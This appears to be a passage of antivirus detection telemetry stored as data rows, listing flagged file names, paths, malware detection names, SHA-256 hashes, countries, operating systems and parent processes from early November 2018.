  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T12:59:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:02:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsh3A38.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T14:00:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unpacked.exe', filepath='D:\\العاب بنات\\كل المطعم\\Sallys Salon\\unpacked.exe', filesize=1536000, name='HEUR/Patched.Ren.#M1.#R1'), hash='c18191f4d5799b3f8feb5d6cb0da47c47dd0b5ad7c84acbc119fc1babe3bf6a8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:37:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='ced0d8b9cec3ff9f44530bbe105fd15b66d0cce99824acaf24074e4d23151d7d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T03:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153504-3816ea44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c558025\\AVSCAN-20181102-153453-3660B6C5\\AVSCAN-20181102-153504-3816EA44', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xwgxuzdc.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XWgxuZdc.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140158-46adf405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b632e5a\\AVSCAN-20181102-140039-39D8310E\\AVSCAN-20181102-140158-46ADF405', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:02:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143035-73a41db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9228d2e\\AVSCAN-20181102-143014-7073373B\\AVSCAN-20181102-143035-73A41DB5', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zecminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0qp\\\\\\/Q\\\\\\/Iis0Oes0FD.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iikfkxnjb.exe', filepath='c:\\users\\X\\appdata\\roaming\\iikfkxnjb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trunks kid.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks kid\\Trunks kid.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='7ae16d5748ad40197bb507a3ced7e7aad026a71e57136b5bba50b0063d8428b7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195457-9e2b74f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_001e0289\\AVSCAN-20181102-194148-54DD84AC\\AVSCAN-20181102-195457-9E2B74F9', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:24:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kcqtmccg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kCQtmcCg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='net3system.exe', filepath='C:\\Windows\\Temp\\Net3System.exe', filesize=384000, name='PUA/CoinMiner.Gen.#M300.#R8197'), hash='c4bb691a7e52ed126caf3abf852c8e9bbde91cb37185b1d06e9acfb6f4379346', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:35:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p711s-e5_update_21.110.99.03.00.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\7zE4BF831AB\\E5573 UNLOCK\\2nd STEP(Huawei_E5573s-606_Firmware_21.110.99.03.00)\\P711s-E5_Update_21.110.99.03.00.exe', filesize=51456000, name='W32/Ramnit.CD.#M1.#R1'), hash='b14a8c1efd1b89b78cbe4989cee5f38fa16aa4a95852bc4aedbd3e2b0d9bca8a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\E5573 UNLOCK.rar\\\\\\" -t', country='CM', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\7-Zip\\7zFM.exe', parentsize=746496, timestamp='2018-11-02T07:59:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hangaroo.exe', filepath='D:\\STIKES\\Pak Pri\\Master\\GATOT\\PRESTASI\\lain-lain\\Games\\SpongeBob Collapse\\GameFlash\\Game\\HANGAROO.EXE', filesize=704000, name='TR/Patched.Ren.Gen.#M300.#R3369'), hash='7e6aef5573baa817e94a0f1918608010c8dd7240ad26133590a690b6a65df62a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\Serverx.exe', parentsize=37066, timestamp='2018-11-02T04:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083243-c1108ffa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083243-C1108FFA', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='I:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='genfori.exe', filepath='\\\\ts-xelcea\\share\\vecchio pc dino\\hd vecchio pc\\CDSWIN\\genfori.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='d71c0ede81eaeafea2b53bbfe013a0e3c6ede27d4744e1fc3e94400ec17c77f3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='introduction.exe', filepath='G:\\\xa0\\IT\\IT(1)\\introduction.exe', filesize=4608000, name='W32/Sality.AT.#M1.#R1'), hash='b3935d4e21cf855e252346ba8f35835643115394005654abfc26576d7796d81d', metadata=Row(cmdline='rtp', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1630208, timestamp='2018-11-02T16:58:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b00cea9fd8acc0f076a377f082cd63ce78fe7e9314ca6d9bbe130c5cc38b47ee.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B00CEA9FD8ACC0F076A377F082CD63CE78FE7E9314CA6D9BBE130C5CC38B47EE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b00cea9fd8acc0f076a377f082cd63ce78fe7e9314ca6d9bbe130c5cc38b47ee', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274030003.pif', filepath='F:\\scan-peta-wb-sp2010\\3274030\\3274030003\\3274030003.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bg.exe', filepath='F:\\lok tihar 2018\\bg\\bg.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tbb.dll', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Utilities - CS5\\Pixel Bender Toolkit 2\\tbb.dll', filesize=320000, name='W32/Nimnul.D.#M1.#R1'), hash='cb6fb8e4d92400da3a7030d32f1651b0a9e1a066953a412cd034775287a16a64', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T07:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0m2ks1n4ahy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='systm.exe', filepath='C:\\Users\\X\\Desktop\\OrganiZen\\Tümü bir arada 29-09-2017\\csduragi_cs16\\new2\\systm.exe', filesize=1472000, name='W32/Ramnit.C.#M1.#R1'), hash='9b861b0a70f3ed516a9b36b828f80c4a0aa63204cf38ec00c73bb5b4d9a9611b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:hu2WEMHng02iyUzM.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='armcc.exe', filepath='\\\\?\\C:\\Program Files\\ARM\\RVCT\\Programs\\3.1\\569\\win_32-pentium\\armcc.exe', filesize=8192000, name='W32/Ramnit.CD.#M1.#R1'), hash='e33e793188eb4f6528511a687c4341b915394ec6590538d6714516b391818516', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='researchdownload.exe', filepath='H:\\Android\\AsiaFone\\ResearchDownload\\Bin\\ResearchDownload.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='afd4562cc3d722aa03c37c1aec00d0809ac9f5f93ce1c09502b1ff68ec54c420', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:47:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215619-8d24198d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81119d20\\AVSCAN-20181102-215524-84362191\\AVSCAN-20181102-215619-8D24198D', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:26:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filepath='H:\\{b3472fcc-224a-2bc9-a158-42418a120920}\\dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbcc46f6f225bfea3e6f0d3591dfedeb8e75cba2d30c044b348281947745bbe2', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00296ace', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296ace', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:31:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a198', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a198', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:54:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5b99abfe61fb5628cc5f41b481018dc1fd68605c', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5b99abfe61fb5628cc5f41b481018dc1fd68605c', filesize=5632000, name='W32/Sality.AT.#M1.#R1'), hash='e0ce60953a323c4f0077fd49368b2f25a26fec6c1b678ae8830bde8f779886b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dd5c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dd5c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='junk store_pop3e8a42_1cc_3328_1104_pop3_vodafone_ip_de_110.hxml', filepath='\\?\\D:\\Hexamail\\Hexamail POP3 Downloader\\emailjunk\\Junk Store_POP3E8A42_1CC_3328_1104_pop3_vodafone_ip_de_110.hxml', filesize=12000, name='VBS/Dldr.Agent.8061.#M1.#R1'), hash='efd2372c14d17517754b21855910027cb62ccee019d0749113a25f12a0f75a01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202908-a585d2f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_690ab3e1\\AVSCAN-20181104-201541-5A869D8C\\AVSCAN-20181104-202908-A585D2F9', filesize=64000, name='TR/Spy.64000.63.#M1.#R1'), hash='ffc50b193a6366a5f551fa5365535af36ea20167a5dd6da842da49cf6b0a76e4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~se1426.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se1426.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='dda8bafe207bea21c09b3b1ce76532914eeaca1e7750148a0e92bafba556a4da', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:52:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufrii_driver_v2120_w32_sc_12.exe', filepath='H:\\ISMAIL 2018.11.4\\ISMAIL BACHA 2018\\Canon iR1133\\canon\\UFRII_Driver_V2120_W32_SC_12.exe', filesize=33280000, name='W32/Chir.B.#M1.#R1'), hash='d11531a2035dac5df815d6d6ea48bd2db0e19a01b256a5fd60fac4cdfb0dda85', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\setup.exe', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='b4b2347e4416075fa0dd4ce8155ff2e67bc3a061b9ec6904da41423cc07d5b7b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k netsvcs', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:39:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline='\\\\\\/onboot', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-04T05:56:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165057-0d9a6c65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-165057-0D9A6C65', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='e4dfd76ff691da02eaa433eaf389fc35898121c798cf50c4e2e3b1ddd7e5cf23', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:50:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FA37753799DCDB649F99C3F7A9E33C670DA40666DFB0C9721F2B33F6DF96F677', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='fa37753799dcdb649f99c3f7a9e33c670da40666dfb0c9721f2b33f6df96f677', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB20317818EFC5C33E6E6DCA73E50886A2955C845AE55FF90619BFCC33A28E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" 